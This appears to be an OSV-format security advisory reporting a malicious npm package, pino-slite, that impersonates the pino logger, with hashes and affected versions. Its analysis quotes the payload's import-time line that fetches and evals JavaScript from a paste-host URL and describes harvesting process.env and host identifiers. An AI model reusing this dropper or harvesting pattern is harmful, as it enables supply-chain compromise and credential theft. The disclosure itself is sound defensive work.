{
  "id": "MAL-2026-6078",
  "summary": "Malicious code in pino-slite (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb)\npino-slite impersonates the legitimate `pino` logger: its README is titled 'pino-slite (Pino)', carries pino's badges, points its homepage at getpino.io, and the package's exported function is named `pino`. On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload runs `fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);})`, executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a `data` object containing `{...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: <non-internal IPv4 MACs>}`, which is in scope for the remotely fetched code. That gives the second stage a ready-made channel to exfiltrate the full environment of whatever process requires the package (CI secrets, AWS_*, NPM_TOKEN, GitHub tokens, etc.) together with host identifiers.\n\nThis combines a typosquat lure, an import-time RCE dropper fed from an attacker-controlled mutable URL, and an environment-credential harvester.\n",
  "modified": "2026-06-17T22:01:48.280824847Z",
  "published": "2026-06-17T21:40:46Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "modified_time": "2026-06-17T21:40:46Z",
        "versions": ["4.1.16"],
        "source": "amazon-inspector",
        "id": "IN-MAL-2026-006944",
        "sha256": "7ed71e73ac59b29f0867d2fbb15fc0391049b1ba4fe3c7b310bfbd1e84067c9e",
        "import_time": "2026-06-17T21:42:18.197754588Z"
      },
      {
        "modified_time": "2026-06-17T21:40:49Z",
        "versions": ["4.1.12"],
        "source": "amazon-inspector",
        "import_time": "2026-06-17T21:42:18.296198728Z",
        "sha256": "ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb",
        "id": "IN-MAL-2026-006945"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/pino-slite/v/4.1.16"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/pino-slite/v/4.1.12"}
  ],
  "affected": [
    {
      "package": {"name": "pino-slite", "ecosystem": "npm", "purl": "pkg:npm/pino-slite"},
      "versions": ["4.1.16", "4.1.12"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json",
        "cwes": [
          {"name": "Embedded Malicious Code", "description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506"}
        ],
        "indicators": {
          "package_integrity": [
            {
              "hashes": {
                "sha512_sri": "sha512-TUxVgdCfhTtdPbyD/tiDcnbJlDO8HxSebYFT2UBAHexWwVdEDqxT6uHDzdP0+uhHU0egoOWk5dY8NqCioL3+dA==",
                "sha1": "1e3cc2363b6a71bdcb7ae8e3052c3b557fbbbd8f"
              },
              "filename": "pino-slite-4.1.16.tgz"
            }
          ],
          "evidence_files": [
            {"tlsh": "c61104a195e7649816302be10cc74820bed5b3423197809cbabcc5d52fe7ce17195f70", "path": "lib/writer.js", "sha256": "b6a7f0998e9b8ce77f9492f1156159f143faded6f9d27a790d19e4af8a7d221f"},
            {"tlsh": "b3016425ce688e6309d92992882d1187aa60ad6b980cfc2c73c3631d0f8d57f19be57d", "path": "package.json", "sha256": "e84dbee6692b3b39e05a3f3a0873c248336ce1690c1d3141f0ae2e12466c016b"}
          ]
        }
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [{"name": "Amazon Inspector", "contact": ["inspector-research@amazon.com"], "type": "FINDER"}]
}